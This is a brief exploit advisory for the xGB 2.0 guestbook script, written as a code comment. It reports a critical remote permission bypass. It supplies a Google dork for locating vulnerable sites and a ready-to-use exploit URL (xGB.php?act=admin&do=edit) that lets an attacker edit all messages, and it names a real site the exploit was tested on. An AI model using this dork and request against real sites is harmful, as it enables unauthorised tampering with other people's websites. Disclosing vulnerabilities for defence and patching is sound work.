/*
 *
 * xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
 * Bug discovered by DarkFuneral
 * http://www.darkfuneral89.altervista.org/
 *
 * Affected Software: xGB
 * CMS Site: "i don't know! :P"
 * Severity: Critical
 * Description: An attacker can edit all messages in xGB
 * Google Dork: allinurl:"xGb.php"
 *
 * E-Mail: darkfuneral89@gmail.com
 *
 * Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
 *
 * Tested on www.culturebeach.de/guestbook.php
 *
 * Special Greetz to SystemFAILURE because I Love Him...
 *
 */